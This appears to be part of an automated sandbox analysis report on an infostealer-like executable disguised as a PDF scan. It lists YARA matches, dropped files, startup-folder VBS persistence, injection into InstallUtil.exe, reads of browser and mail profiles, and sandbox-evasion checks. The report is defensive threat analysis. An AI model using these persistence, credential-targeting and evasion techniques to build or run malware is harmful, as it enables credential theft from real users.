                      Source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                      Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                      Source: rScan_0984829339_PDF.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: rScan_0984829339_PDF.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: rScan_0984829339_PDF.exe ReversingLabs: Detection: 31%
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe File read: C:\Users\user\Desktop\rScan_0984829339_PDF.exe
                      Source: unknown Process created: C:\Users\user\Desktop\rScan_0984829339_PDF.exe "C:\Users\user\Desktop\rScan_0984829339_PDF.exe"
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Guid.exe "C:\Users\user\AppData\Roaming\Guid.exe"
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll, ntmarta.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wtsapi32.dll, winsta.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll
                      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, sspicli.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, amsi.dll, userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: rScan_0984829339_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: rScan_0984829339_PDF.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rScan_0984829339_PDF.exe, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003DD5000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2280814775.0000000003D08000.00000004.00000800.00020000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2282883886.0000000005AB0000.00000004.08000000.00040000.00000000.sdmp, rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004030000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000003F78000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: rScan_0984829339_PDF.exe, 00000000.00000002.2284754517.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.000000000441E000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: rScan_0984829339_PDF.exe, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Source: Guid.exe.0.dr, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.3dd57f8.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.rScan_0984829339_PDF.exe.6850000.8.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.rScan_0984829339_PDF.exe.5ab0000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.rScan_0984829339_PDF.exe.3e24018.2.raw.unpack, Shvnzxplak.cs.Net Code: Bhycju System.AppDomain.Load(byte[])
                      Source: Yara matchFile source: 0.2.rScan_0984829339_PDF.exe.6920000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.43405e8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.424e9c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Guid.exe.424e9c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2284941068.0000000006920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2482319443.0000000004164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066BFAF3 push es; ret 2_2_066BFAF4
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_015A070D pushad ; ret 5_2_015A070E
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06076636 push ebp; retf 5_2_06076644
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06073FED push es; retf 5_2_06074030
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06073FED push es; retf 5_2_06074054
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06076AB0 push esp; retf 5_2_06076ABD
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074B82 push es; iretd 5_2_06074BB4
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074B82 push es; retf 5_2_06074BF8
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074BB5 push es; retf 5_2_06074BF8
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_060753CF push ecx; iretd 5_2_060753D0
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_06074031 push es; retf 5_2_06074054
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07681A22 push ss; ret 5_2_07681A23
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07681AC4 push ss; ret 5_2_07681AC5
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_07682575 push cs; ret 5_2_07682576
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076825FD push cs; ret 5_2_07682604
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076815F4 push ds; ret 5_2_076815FA
                      Source: C:\Users\user\AppData\Roaming\Guid.exeCode function: 5_2_076815C2 push ds; ret 5_2_076815C8
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Guid.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbsJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match; File source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Memory allocated: 12E0000 memory reserve | memory write watch
